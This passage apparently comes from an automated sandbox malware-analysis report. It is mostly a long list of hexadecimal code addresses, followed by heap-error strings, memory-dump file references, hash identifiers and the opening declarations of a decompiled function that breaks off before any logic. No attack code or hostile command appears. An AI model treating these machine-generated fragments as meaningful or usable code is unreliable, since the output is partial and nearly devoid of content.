                                                0x0095a46f
                                                0x0095a472
                                                0x0095a476
                                                0x0095a498
                                                0x0095a49d
                                                0x0095a478
                                                0x0095a490
                                                0x0095a495
                                                0x0095a4aa
                                                0x0095a4b1
                                                0x0095a4ba
                                                0x0095a4ba
                                                0x0095a463
                                                0x0095a42c
                                                0x009237aa
                                                0x009237b3
                                                0x009237b5
                                                0x009237b8
                                                0x009237bd
                                                0x0095a843
                                                0x00000000
                                                0x009237c3
                                                0x009237c3
                                                0x009237cd
                                                0x009237d1
                                                0x009237d6
                                                0x009237da
                                                0x0095a4f8
                                                0x0095a4fc
                                                0x0095a500
                                                0x0095a503
                                                0x0095a506
                                                0x0095a519
                                                0x0095a51e
                                                0x0095a51e
                                                0x0095a51e
                                                0x0095a51e
                                                0x0095a522
                                                0x0095a528
                                                0x0095a52a
                                                0x0095a568
                                                0x0095a568
                                                0x0095a56b
                                                0x00000000
                                                0x00000000
                                                0x0095a560
                                                0x0095a562
                                                0x0095a564
                                                0x0095a577
                                                0x0095a577
                                                0x0095a578
                                                0x0095a57b
                                                0x0095a57b
                                                0x0095a57e
                                                0x0095a57e
                                                0x0095a581
                                                0x0095a584
                                                0x0095a587
                                                0x0095a58c
                                                0x0095a58f
                                                0x0095a592
                                                0x0095a594
                                                0x00000000
                                                0x00000000
                                                0x0095a59a
                                                0x0095a59d
                                                0x0095a59f
                                                0x0095a5b3
                                                0x0095a5a1
                                                0x0095a5a1
                                                0x0095a5a4
                                                0x0095a5a7
                                                0x0095a5a9
                                                0x0095a5ab
                                                0x0095a5ab
                                                0x0095a5ab
                                                0x0095a5ae
                                                0x0095a5ae
                                                0x0095a5bc
                                                0x0095a5be
                                                0x0095a5c6
                                                0x0095a5c9
                                                0x0095a5cb
                                                0x0095a5de
                                                0x0095a5cd
                                                0x0095a5cd
                                                0x0095a5cf
                                                0x0095a5d2
                                                0x0095a5d4
                                                0x0095a5d6
                                                0x0095a5d6
                                                0x0095a5d6
                                                0x0095a5d9
                                                0x0095a5d9
                                                0x0095a5e9
                                                0x0095a5eb
                                                0x0095a5f4
                                                0x0095a5f7
                                                0x0095a5fa
                                                0x0095a652
                                                0x0095a652
                                                0x0095a662
                                                0x0095a665
                                                0x0095a673
                                                0x0095a677
                                                0x0095a677
                                                0x0095a679
                                                0x0095a68d
                                                0x0095a690
                                                0x0095a692
                                                0x0095a6be
                                                0x0095a6be
                                                0x0095a6c4
                                                0x0095a6d5
                                                0x0095a6dc
                                                0x0095a6dc
                                                0x0095a6c6
                                                0x0095a6c6
                                                0x0095a6cd
                                                0x0095a6cd
                                                0x0095a694
                                                0x0095a69b
                                                0x0095a69b
                                                0x0095a69d
                                                0x0095a6ad
                                                0x0095a6b4
                                                0x0095a69f
                                                0x0095a69f
                                                0x0095a69f
                                                0x0095a69f
                                                0x0095a69d
                                                0x0095a6e2
                                                0x0095a6e4
                                                0x0095a6e7
                                                0x0095a6eb
                                                0x0095a6ee
                                                0x0095a6f0
                                                0x0095a6f0
                                                0x0095a6f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095a67b
                                                0x0095a67b
                                                0x0095a67b
                                                0x0095a67d
                                                0x00000000
                                                0x00000000
                                                0x0095a67f
                                                0x0095a682
                                                0x0095a684
                                                0x0095a685
                                                0x0095a687
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095a687
                                                0x0095a689
                                                0x0095a68b
                                                0x0095a6fd
                                                0x0095a6fd
                                                0x0095a6fd
                                                0x0095a701
                                                0x0095a701
                                                0x0095a704
                                                0x0095a706
                                                0x00000000
                                                0x00000000
                                                0x0095a70f
                                                0x0095a711
                                                0x0095a714
                                                0x0095a717
                                                0x0095a71a
                                                0x0095a71d
                                                0x0095a71f
                                                0x00000000
                                                0x0095a71f
                                                0x00000000
                                                0x0095a68b
                                                0x0095a600
                                                0x0095a603
                                                0x00000000
                                                0x00000000
                                                0x0095a605
                                                0x0095a608
                                                0x0095a60c
                                                0x0095a60e
                                                0x0095a60e
                                                0x0095a60e
                                                0x0095a613
                                                0x0095a640
                                                0x0095a640
                                                0x0095a642
                                                0x00000000
                                                0x00000000
                                                0x0095a618
                                                0x0095a61a
                                                0x0095a62e
                                                0x0095a61c
                                                0x0095a61c
                                                0x0095a61f
                                                0x0095a622
                                                0x0095a624
                                                0x0095a626
                                                0x0095a626
                                                0x0095a626
                                                0x0095a629
                                                0x0095a629
                                                0x0095a63a
                                                0x0095a63c
                                                0x0095a63e
                                                0x00000000
                                                0x0095a63e
                                                0x0095a64a
                                                0x00000000
                                                0x0095a64a
                                                0x00000000
                                                0x0095a5ed
                                                0x0095a5ed
                                                0x00000000
                                                0x0095a5ed
                                                0x0095a5eb
                                                0x0095a6f8
                                                0x0095a6f8
                                                0x00000000
                                                0x0095a6f8
                                                0x0095a584
                                                0x0095a566
                                                0x0095a566
                                                0x0095a56d
                                                0x0095a56f
                                                0x00000000
                                                0x0095a52c
                                                0x0095a52c
                                                0x0095a532
                                                0x0095a532
                                                0x0095a538
                                                0x0095a53a
                                                0x0095a73d
                                                0x0095a73d
                                                0x0095a740
                                                0x0095a743
                                                0x0095a745
                                                0x0095a748
                                                0x0095a74b
                                                0x0095a74d
                                                0x0095a75b
                                                0x0095a75d
                                                0x0095a75e
                                                0x0095a75f
                                                0x0095a760
                                                0x0095a761
                                                0x0095a762
                                                0x0095a764
                                                0x0095a769
                                                0x0095a74f
                                                0x0095a74f
                                                0x0095a751
                                                0x0095a754
                                                0x0095a756
                                                0x0095a756
                                                0x0095a76f
                                                0x0095a772
                                                0x0095a778
                                                0x0095a77a
                                                0x0095a81f
                                                0x0095a81f
                                                0x0095a823
                                                0x0095a831
                                                0x0095a837
                                                0x0095a837
                                                0x009037aa
                                                0x00000000
                                                0x0095a780
                                                0x0095a780
                                                0x0095a78d
                                                0x0095a78d
                                                0x0095a790
                                                0x00000000
                                                0x00000000
                                                0x0095a785
                                                0x0095a787
                                                0x0095a789
                                                0x0095a799
                                                0x0095a799
                                                0x0095a79a
                                                0x0095a79c
                                                0x0095a79f
                                                0x0095a7a3
                                                0x0095a7a6
                                                0x0095a7a8
                                                0x0095a7a8
                                                0x0095a7a8
                                                0x0095a7aa
                                                0x0095a7b0
                                                0x0095a7b3
                                                0x0095a7b6
                                                0x0095a7bd
                                                0x0095a7c0
                                                0x0095a7c2
                                                0x0095a7c4
                                                0x0095a7c4
                                                0x0095a7c4
                                                0x0095a7c4
                                                0x0095a7c7
                                                0x0095a7c9
                                                0x0095a7f1
                                                0x0095a7fa
                                                0x0095a7fd
                                                0x00000000
                                                0x0095a7cb
                                                0x0095a7cb
                                                0x0095a7cf
                                                0x0095a7e1
                                                0x0095a7d1
                                                0x0095a7d1
                                                0x0095a7d4
                                                0x0095a7d7
                                                0x0095a7d9
                                                0x0095a7d9
                                                0x0095a7d9
                                                0x0095a7dc
                                                0x0095a7dc
                                                0x0095a7ed
                                                0x0095a7ef
                                                0x0095a800
                                                0x0095a800
                                                0x0095a802
                                                0x0095a80f
                                                0x0095a81a
                                                0x0095a81a
                                                0x0095a81c
                                                0x0095a81c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095a7ef
                                                0x0095a7c9
                                                0x0095a78b
                                                0x0095a78b
                                                0x0095a792
                                                0x00000000
                                                0x0095a792
                                                0x0095a77a
                                                0x0095a540
                                                0x0095a543
                                                0x0095a543
                                                0x0095a545
                                                0x0095a727
                                                0x0095a54b
                                                0x0095a54b
                                                0x0095a54e
                                                0x0095a551
                                                0x0095a553
                                                0x0095a555
                                                0x0095a555
                                                0x0095a555
                                                0x0095a558
                                                0x0095a558
                                                0x0095a72e
                                                0x0095a731
                                                0x00000000
                                                0x00000000
                                                0x0095a733
                                                0x0095a735
                                                0x0095a737
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095a737
                                                0x00000000
                                                0x0095a543
                                                0x0095a52a
                                                0x009237e0
                                                0x009237e3
                                                0x009237e7
                                                0x009237ed
                                                0x009237f0
                                                0x009237f2
                                                0x009237f9
                                                0x009237f9
                                                0x009237fc
                                                0x00000000
                                                0x00000000
                                                0x00923292
                                                0x00923294
                                                0x00923296
                                                0x00925f94
                                                0x00000000
                                                0x00925f94
                                                0x0092329c
                                                0x0092329c
                                                0x00923802
                                                0x00923805
                                                0x00923808
                                                0x0092380b
                                                0x0092380e
                                                0x00923814
                                                0x00923817
                                                0x00923819
                                                0x0092381c
                                                0x0092381e
                                                0x00000000
                                                0x00000000
                                                0x00923824
                                                0x00923827
                                                0x00923829
                                                0x009490b4
                                                0x0092382f
                                                0x0092382f
                                                0x00923832
                                                0x00923835
                                                0x00923837
                                                0x00923839
                                                0x00923839
                                                0x00923839
                                                0x0092383c
                                                0x0092383c
                                                0x00923847
                                                0x0092384a
                                                0x0092384c
                                                0x00923854
                                                0x00923857
                                                0x00923859
                                                0x009490bd
                                                0x0092385f
                                                0x0092385f
                                                0x00923861
                                                0x00923864
                                                0x00923866
                                                0x00923868
                                                0x00923868
                                                0x00923868
                                                0x0092386b
                                                0x0092386b
                                                0x00923876
                                                0x00923878
                                                0x00934f46
                                                0x00000000
                                                0x0092387e
                                                0x0092387e
                                                0x00923881
                                                0x00923884
                                                0x00923893
                                                0x00923893
                                                0x0092389c
                                                0x009238a0
                                                0x009238a3
                                                0x009238b1
                                                0x009238b5
                                                0x009238b5
                                                0x009238b7
                                                0x009238bb
                                                0x009238bb
                                                0x009238bd
                                                0x00000000
                                                0x00000000
                                                0x009238bf
                                                0x009238c2
                                                0x009238c4
                                                0x009238c5
                                                0x009238c7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009238c7
                                                0x009238c9
                                                0x009238cb
                                                0x009215d0
                                                0x00923918
                                                0x00923918
                                                0x0092391b
                                                0x0092391d
                                                0x009215dc
                                                0x009215de
                                                0x009215e3
                                                0x009215e6
                                                0x00000000
                                                0x009215e6
                                                0x00923923
                                                0x00923923
                                                0x00923929
                                                0x0092392b
                                                0x00923954
                                                0x00923954
                                                0x0092395a
                                                0x0092395c
                                                0x0092395f
                                                0x00923962
                                                0x00923964
                                                0x0095a4e7
                                                0x0095a4e8
                                                0x0095a4e9
                                                0x0095a4ea
                                                0x0095a4eb
                                                0x0095a4ec
                                                0x0095a4ee
                                                0x0092396a
                                                0x0092396a
                                                0x0092396c
                                                0x0092396f
                                                0x00923971
                                                0x00923971
                                                0x0092397a
                                                0x0092397d
                                                0x00923983
                                                0x00923985
                                                0x00903791
                                                0x00903795
                                                0x00903797
                                                0x009037a2
                                                0x009037a8
                                                0x009037a8
                                                0x00000000
                                                0x0092398b
                                                0x0092398e
                                                0x00923991
                                                0x00923991
                                                0x00923994
                                                0x00000000
                                                0x00000000
                                                0x009232a3
                                                0x009232a5
                                                0x009232a7
                                                0x00925f9d
                                                0x00000000
                                                0x00925f9d
                                                0x009232ad
                                                0x009232ad
                                                0x0092399c
                                                0x0092399f
                                                0x009239a3
                                                0x009239a6
                                                0x009239a8
                                                0x009239a8
                                                0x009239a8
                                                0x009239aa
                                                0x009239b2
                                                0x009239b5
                                                0x009239bc
                                                0x009239be
                                                0x00925f89
                                                0x00925f89
                                                0x009239c4
                                                0x009239c6
                                                0x0090376c
                                                0x00903772
                                                0x00000000
                                                0x009239cc
                                                0x009239cc
                                                0x009239d0
                                                0x009490ab
                                                0x009490ab
                                                0x009041da
                                                0x009041e5
                                                0x009041e7
                                                0x00000000
                                                0x00000000
                                                0x00903775
                                                0x00903777
                                                0x0090378f
                                                0x0090378f
                                                0x00000000
                                                0x00903777
                                                0x009239d6
                                                0x009239d9
                                                0x009041d2
                                                0x009041d2
                                                0x009041d4
                                                0x009041d4
                                                0x009041d4
                                                0x009041d7
                                                0x00000000
                                                0x009041d7
                                                0x009239c6
                                                0x00923985
                                                0x0092392d
                                                0x00923930
                                                0x00923930
                                                0x00923932
                                                0x009490ce
                                                0x00923938
                                                0x00923938
                                                0x0092393b
                                                0x0092393e
                                                0x00923940
                                                0x00923942
                                                0x00923942
                                                0x00923942
                                                0x00923945
                                                0x00923945
                                                0x0092394b
                                                0x0092394e
                                                0x00000000
                                                0x00000000
                                                0x0095a4d6
                                                0x0095a4d8
                                                0x0095a4da
                                                0x00000000
                                                0x00000000
                                                0x0095a4e0
                                                0x00000000
                                                0x00923930
                                                0x009238d1
                                                0x009238d4
                                                0x009238d6
                                                0x009239e8
                                                0x009239e8
                                                0x009239ea
                                                0x009239fd
                                                0x00923a04
                                                0x009239ec
                                                0x009239ec
                                                0x009239ec
                                                0x009239ec
                                                0x009238dc
                                                0x009238e1
                                                0x009238e1
                                                0x009238e7
                                                0x009215aa
                                                0x009215b1
                                                0x009238ed
                                                0x009238f0
                                                0x009238f7
                                                0x009238f7
                                                0x009238f7
                                                0x009238e7
                                                0x009238fd
                                                0x009238ff
                                                0x00923902
                                                0x00923906
                                                0x00923909
                                                0x0095a4cf
                                                0x0095a4cf
                                                0x00923912
                                                0x00000000
                                                0x00923912
                                                0x00000000
                                                0x009238b9
                                                0x0092388a
                                                0x0092388d
                                                0x00934b42
                                                0x00934b45
                                                0x00934b49
                                                0x00934b4b
                                                0x00934b4b
                                                0x00934b4b
                                                0x00934b50
                                                0x00934b7b
                                                0x00934b7b
                                                0x00934b7e
                                                0x00000000
                                                0x00000000
                                                0x00934b55
                                                0x00934b57
                                                0x009490c5
                                                0x00934b5d
                                                0x00934b5d
                                                0x00934b60
                                                0x00934b63
                                                0x00934b65
                                                0x00934b67
                                                0x00934b67
                                                0x00934b67
                                                0x00934b6a
                                                0x00934b6a
                                                0x00934b75
                                                0x00934b77
                                                0x00934b85
                                                0x00000000
                                                0x00934b79
                                                0x00934b79
                                                0x00000000
                                                0x00934b79
                                                0x00934b77
                                                0x00000000
                                                0x00934b80
                                                0x00000000
                                                0x0092388d
                                                0x00923878
                                                0x00923915
                                                0x00923915
                                                0x00000000
                                                0x00923915
                                                0x0092380b
                                                0x0095a4c4
                                                0x00000000
                                                0x0095a4c4
                                                0x009237bd
                                                0x009236d6
                                                0x009236d9
                                                0x009236d9
                                                0x009236dc
                                                0x00000000
                                                0x00000000
                                                0x009232b4
                                                0x009232b6
                                                0x009232b8
                                                0x00925fa6
                                                0x00925fa7
                                                0x009236e7
                                                0x009236e9
                                                0x009236ec
                                                0x009236f0
                                                0x009236f3
                                                0x009236f5
                                                0x009236f5
                                                0x009236f5
                                                0x009236fa
                                                0x009236fd
                                                0x009236ff
                                                0x00923704
                                                0x00923707
                                                0x0092370e
                                                0x00923710
                                                0x00925faf
                                                0x00925faf
                                                0x00923716
                                                0x00923719
                                                0x0092371c
                                                0x00923785
                                                0x00923785
                                                0x00000000
                                                0x0092371e
                                                0x0092371e
                                                0x00923721
                                                0x00923724
                                                0x009232c5
                                                0x009232c5
                                                0x0092372a
                                                0x0092372d
                                                0x00923730
                                                0x00925fb7
                                                0x00925fba
                                                0x00925fbd
                                                0x00934b8d
                                                0x00925fc3
                                                0x00925fc3
                                                0x00925fde
                                                0x00925fde
                                                0x00000000
                                                0x00923736
                                                0x00923736
                                                0x00923739
                                                0x00923761
                                                0x00923767
                                                0x0092376b
                                                0x00923776
                                                0x00923783
                                                0x00923783
                                                0x00000000
                                                0x00923783
                                                0x0092373b
                                                0x0092373f
                                                0x0094905c
                                                0x00923745
                                                0x00923745
                                                0x00923748
                                                0x0092374b
                                                0x0092374d
                                                0x0092374d
                                                0x0092374d
                                                0x00923750
                                                0x00923750
                                                0x00923759
                                                0x0092375b
                                                0x00934317
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092375b
                                                0x00923730
                                                0x0092371c
                                                0x009232be
                                                0x009232be
                                                0x009236e2
                                                0x009236e4
                                                0x00000000
                                                0x009236e4
                                                0x0095a373
                                                0x0095a376
                                                0x0095a37f
                                                0x0095a389
                                                0x0095a389
                                                0x0095a391
                                                0x0095a391
                                                0x0090358a
                                                0x0090358e
                                                0x00903592
                                                0x00922688
                                                0x0092268c
                                                0x00922690
                                                0x00922693
                                                0x00922696
                                                0x0095a3de
                                                0x0095a3e3
                                                0x0095a3e3
                                                0x0092269c
                                                0x009226a2
                                                0x009226a4
                                                0x009226ab
                                                0x009226ab
                                                0x009226ae
                                                0x00000000
                                                0x00000000
                                                0x00922850
                                                0x00922852
                                                0x00922854
                                                0x00921853
                                                0x00921854
                                                0x009226b9
                                                0x009226b9
                                                0x009226bc
                                                0x009226bc
                                                0x009226bf
                                                0x009226c2
                                                0x009226c5
                                                0x009226ca
                                                0x009226cd
                                                0x009226d0
                                                0x009226d2
                                                0x00000000
                                                0x00000000
                                                0x009226d8
                                                0x009226db
                                                0x009226dd
                                                0x00949088
                                                0x009226e3
                                                0x009226e3
                                                0x009226e6
                                                0x009226e9
                                                0x009226eb
                                                0x009226ed
                                                0x009226ed
                                                0x009226ed
                                                0x009226f0
                                                0x009226f0
                                                0x009226f8
                                                0x009226fa
                                                0x00922702
                                                0x00922705
                                                0x00922707
                                                0x00949091
                                                0x0092270d
                                                0x0092270d
                                                0x0092270f
                                                0x00922712
                                                0x00922714
                                                0x00922716
                                                0x00922716
                                                0x00922716
                                                0x00922719
                                                0x00922719
                                                0x00922724
                                                0x00922726
                                                0x00922861
                                                0x00000000
                                                0x0092272c
                                                0x0092272c
                                                0x0092272f
                                                0x00922732
                                                0x00933c60
                                                0x00933c63
                                                0x00000000
                                                0x00000000
                                                0x00933c69
                                                0x00933c6c
                                                0x00933c70
                                                0x00933c72
                                                0x00933c72
                                                0x00933c72
                                                0x00933c77
                                                0x00933c7a
                                                0x00933c7a
                                                0x00933c7c
                                                0x00000000
                                                0x00000000
                                                0x00933c82
                                                0x00933c84
                                                0x00949099
                                                0x00933c8a
                                                0x00933c8a
                                                0x00933c8d
                                                0x00933c90
                                                0x00933c92
                                                0x00933c94
                                                0x00933c94
                                                0x00933c94
                                                0x00933c97
                                                0x00933c97
                                                0x00933ca2
                                                0x00933ca4
                                                0x00949055
                                                0x00000000
                                                0x00933caa
                                                0x00933caa
                                                0x00000000
                                                0x00933caa
                                                0x00933ca4
                                                0x009227c0
                                                0x009227c0
                                                0x009227c3
                                                0x009227c5
                                                0x00933cbe
                                                0x00933cc0
                                                0x00933cc3
                                                0x00933cc6
                                                0x00933cc9
                                                0x00933ccc
                                                0x00933cce
                                                0x00000000
                                                0x00933cce
                                                0x00000000
                                                0x009227c5
                                                0x00922738
                                                0x00922738
                                                0x00922748
                                                0x0092274b
                                                0x00922759
                                                0x0092275d
                                                0x0092275d
                                                0x0092275f
                                                0x00922763
                                                0x00922763
                                                0x00922765
                                                0x00000000
                                                0x00000000
                                                0x00922767
                                                0x0092276a
                                                0x0092276c
                                                0x0092276d
                                                0x0092276f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092276f
                                                0x00922771
                                                0x00922773
                                                0x00933cb2
                                                0x00000000
                                                0x00933cb2
                                                0x00922779
                                                0x0092277c
                                                0x0092277e
                                                0x00933bf2
                                                0x00933bf2
                                                0x00933bf4
                                                0x00933c07
                                                0x00933c0e
                                                0x00933bf6
                                                0x00933bf6
                                                0x00933bf6
                                                0x00933bf6
                                                0x00922784
                                                0x00922789
                                                0x00922789
                                                0x0092278f
                                                0x00933c16
                                                0x00933c1d
                                                0x00922795
                                                0x00922798
                                                0x0092279f
                                                0x0092279f
                                                0x0092279f
                                                0x0092278f
                                                0x009227a5
                                                0x009227a7
                                                0x009227aa
                                                0x009227ae
                                                0x009227b1
                                                0x0095a3f7
                                                0x0095a3f7
                                                0x009227ba
                                                0x00000000
                                                0x009227ba
                                                0x00000000
                                                0x00922761
                                                0x00922726
                                                0x009227bd
                                                0x009227bd
                                                0x00000000
                                                0x009227bd
                                                0x009226c2
                                                0x0092285a
                                                0x0092285a
                                                0x009226b4
                                                0x009226b6
                                                0x00000000
                                                0x009226a6
                                                0x0095a3ec
                                                0x009227cb
                                                0x009227cb
                                                0x009227d1
                                                0x009227d3
                                                0x009227fc
                                                0x009227fc
                                                0x00922802
                                                0x00922804
                                                0x00922807
                                                0x0092280a
                                                0x0092280c
                                                0x0095a40f
                                                0x0095a410
                                                0x0095a411
                                                0x0095a412
                                                0x0095a413
                                                0x0095a414
                                                0x0095a416
                                                0x00922812
                                                0x00922812
                                                0x00922814
                                                0x00922817
                                                0x00922819
                                                0x00922819
                                                0x00922822
                                                0x00922825
                                                0x0092282b
                                                0x0092282d
                                                0x00000000
                                                0x00922833
                                                0x00922836
                                                0x00922839
                                                0x00922839
                                                0x0092283c
                                                0x00000000
                                                0x00000000
                                                0x00922842
                                                0x00922844
                                                0x00922846
                                                0x009042b2
                                                0x009042b5
                                                0x00000000
                                                0x009042b5
                                                0x0092284c
                                                0x0092284c
                                                0x0090373a
                                                0x0090373c
                                                0x00903743
                                                0x00903746
                                                0x00903748
                                                0x00903748
                                                0x0090374f
                                                0x00903752
                                                0x00903755
                                                0x0090375e
                                                0x009042a1
                                                0x009042a1
                                                0x00903766
                                                0x009041f2
                                                0x009041f6
                                                0x00000000
                                                0x00000000
                                                0x009041fc
                                                0x009041ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00903766
                                                0x0092282d
                                                0x009227d5
                                                0x009227d8
                                                0x009227d8
                                                0x009227da
                                                0x009490a2
                                                0x009227e0
                                                0x009227e0
                                                0x009227e3
                                                0x009227e6
                                                0x009227e8
                                                0x009227ea
                                                0x009227ea
                                                0x009227ea
                                                0x009227ed
                                                0x009227ed
                                                0x009227f3
                                                0x009227f6
                                                0x00000000
                                                0x00000000
                                                0x0095a3fe
                                                0x0095a400
                                                0x0095a402
                                                0x00000000
                                                0x00000000
                                                0x0095a408
                                                0x00000000
                                                0x009227d8
                                                0x009226a4
                                                0x00903598
                                                0x0090359b
                                                0x0090359f
                                                0x009035a5
                                                0x009035aa
                                                0x0095a399
                                                0x009036c7
                                                0x009036c7
                                                0x009036cf
                                                0x009036f8
                                                0x009036f8
                                                0x009036fe
                                                0x00903700
                                                0x00903703
                                                0x00903708
                                                0x0095a3bc
                                                0x0095a3bd
                                                0x0095a3be
                                                0x0095a3bf
                                                0x0095a3c0
                                                0x0095a3c1
                                                0x0095a3c3
                                                0x0090370e
                                                0x0090370e
                                                0x00903710
                                                0x00903713
                                                0x00903715
                                                0x00903715
                                                0x0090371e
                                                0x00903721
                                                0x00903729
                                                0x00000000
                                                0x0090372b
                                                0x0090372e
                                                0x00903731
                                                0x009037d5
                                                0x009037d7
                                                0x009037d9
                                                0x00000000
                                                0x00000000
                                                0x009037df
                                                0x009037df
                                                0x00000000
                                                0x00903731
                                                0x009036d1
                                                0x009036d1
                                                0x00000000
                                                0x009036d4
                                                0x009036d6
                                                0x0094907f
                                                0x009036dc
                                                0x009036dc
                                                0x009036df
                                                0x009036e4
                                                0x009036e6
                                                0x009036e6
                                                0x009036e9
                                                0x009036e9
                                                0x009036f2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095a3ab
                                                0x0095a3ab
                                                0x0095a3ad
                                                0x0095a3af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095a3b5
                                                0x009036cf
                                                0x009035b0
                                                0x009037c4
                                                0x009037c6
                                                0x009037c8
                                                0x009042ac
                                                0x00000000
                                                0x009042ac
                                                0x009037ce
                                                0x009037ce
                                                0x009035b9
                                                0x009035bc
                                                0x009035bf
                                                0x009035c2
                                                0x009035c5
                                                0x009035cb
                                                0x009035ce
                                                0x009035d0
                                                0x009035d5
                                                0x00000000
                                                0x00000000
                                                0x009035db
                                                0x009035e0
                                                0x00949065
                                                0x009035e6
                                                0x009035e6
                                                0x009035e9
                                                0x009035ee
                                                0x009035f0
                                                0x009035f0
                                                0x009035f3
                                                0x009035f3
                                                0x009035fe
                                                0x00903603
                                                0x0090360b
                                                0x00903610
                                                0x0094906e
                                                0x00903616
                                                0x00903616
                                                0x00903618
                                                0x0090361d
                                                0x0090361f
                                                0x0090361f
                                                0x00903622
                                                0x00903622
                                                0x0090362f
                                                0x0090435c
                                                0x00000000
                                                0x00903635
                                                0x00903635
                                                0x0090363b
                                                0x00903a4a
                                                0x00903a4d
                                                0x00000000
                                                0x00000000
                                                0x00903a53
                                                0x00903a56
                                                0x00903a5a
                                                0x00903a5c
                                                0x00903a5c
                                                0x00903a5c
                                                0x00903a61
                                                0x00903a64
                                                0x00903a64
                                                0x00903a67
                                                0x00000000
                                                0x00000000
                                                0x00903a6d
                                                0x00903a6f
                                                0x00949076
                                                0x00903a75
                                                0x00903a75
                                                0x00903a78
                                                0x00903a7b
                                                0x00903a7d
                                                0x00903a7f
                                                0x00903a7f
                                                0x00903a7f
                                                0x00903a82
                                                0x00903a82
                                                0x00903a8d
                                                0x00903a8f
                                                0x009342b1
                                                0x00000000
                                                0x00903a95
                                                0x00903a95
                                                0x00000000
                                                0x00903a95
                                                0x00903a8f
                                                0x009036bc
                                                0x009036bc
                                                0x009036c1
                                                0x00903aa9
                                                0x00903aab
                                                0x00903ab0
                                                0x00903ab3
                                                0x00000000
                                                0x00903ab3
                                                0x00000000
                                                0x009036c1
                                                0x00903641
                                                0x00903641
                                                0x0090364a
                                                0x0090364e
                                                0x00903651
                                                0x0090365f
                                                0x00903663
                                                0x00903665
                                                0x0090367d
                                                0x00903682
                                                0x00903ac0
                                                0x00903ac0
                                                0x00903ac6
                                                0x00903ada
                                                0x00903ae1
                                                0x00903ac8
                                                0x00903acb
                                                0x00903ad2
                                                0x00903ad2
                                                0x00903688
                                                0x0090368f
                                                0x00903691
                                                0x009039e5
                                                0x009039ec
                                                0x00903697
                                                0x00903697
                                                0x00903697
                                                0x00903697
                                                0x00903691
                                                0x009036a1
                                                0x009036a3
                                                0x009036aa
                                                0x009036ad
                                                0x0095a3a4
                                                0x0095a3a4
                                                0x009036b6
                                                0x00000000
                                                0x009036b6
                                                0x00903667
                                                0x0090366b
                                                0x0090366e
                                                0x00903670
                                                0x00903673
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00903673
                                                0x00903677
                                                0x00903a9d
                                                0x00000000
                                                0x00903a9d
                                                0x00000000
                                                0x00903677
                                                0x0090362f
                                                0x009036b9
                                                0x009036b9
                                                0x00000000
                                                0x009036b9
                                                0x009035c2

                                                Strings
                                                • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0095A4AC
                                                • HEAP: , xrefs: 0095A498
                                                • HEAP[%wZ]: , xrefs: 0095A48B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-2419525547
                                                • Opcode ID: 49705e24989ef7c73ca15dfc337f78a66bcbebf39cc4d8ebe58d36d61eb61b62
                                                • Instruction ID: 327159be02584db53f4c5a2921a724d4b31867da171ebb35f0d8e963e4e806d1
                                                • Opcode Fuzzy Hash: 49705e24989ef7c73ca15dfc337f78a66bcbebf39cc4d8ebe58d36d61eb61b62
                                                • Instruction Fuzzy Hash: 5EC2AD71604222CFCB18CF19C494A7A77B6FF94301B29C6A9EC568B399D734ED41DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00903040, Relevance: 4.8, Strings: 3, Instructions: 1098COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E00903040(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t574;
				unsigned int _t578;
				void* _t582;
				signed short _t586;
				intOrPtr _t590;
				signed int _t604;
				signed short* _t612;
				void* _t613;
				intOrPtr _t624;
				signed int _t625;
				signed int _t626;
				intOrPtr* _t627;
				signed short _t629;
				intOrPtr _t630;
				signed char* _t631;
				signed short _t632;
				signed char _t633;
				signed char _t636;
				signed int _t637;
				signed char* _t642;
				signed int _t643;
				signed int _t652;
				signed char _t665;
				signed int _t666;
				intOrPtr _t672;
				intOrPtr _t674;
				intOrPtr _t676;
				signed short* _t690;
				signed int _t692;
				signed short _t695;
				signed int _t697;
				signed short* _t699;
				signed short _t700;
				unsigned int _t708;
				signed short _t712;
				signed int _t713;
				signed int _t719;
				signed short _t720;
				signed short _t722;
				signed short _t723;
				signed short _t724;
				signed char _t725;
				signed char _t726;
				void* _t727;
				signed short _t728;
				void* _t729;
				intOrPtr* _t730;
				signed short _t733;
				intOrPtr _t734;
				signed char* _t735;
				signed short _t736;
				signed short* _t740;
				signed int _t754;
				unsigned int _t756;
				signed int _t761;
				signed short _t762;
				signed int _t763;
				signed int _t765;
				signed int _t769;
				signed char _t773;
				signed short* _t780;
				signed int _t786;
				signed short _t787;
				signed int _t789;
				intOrPtr* _t790;
				intOrPtr* _t791;
				intOrPtr* _t792;
				signed short _t795;
				signed short _t812;
				signed int _t813;
				signed short _t825;
				signed int _t827;
				signed int _t835;
				signed int _t836;
				intOrPtr _t838;
				signed short _t839;
				signed short _t841;
				signed short _t846;
				signed int _t849;
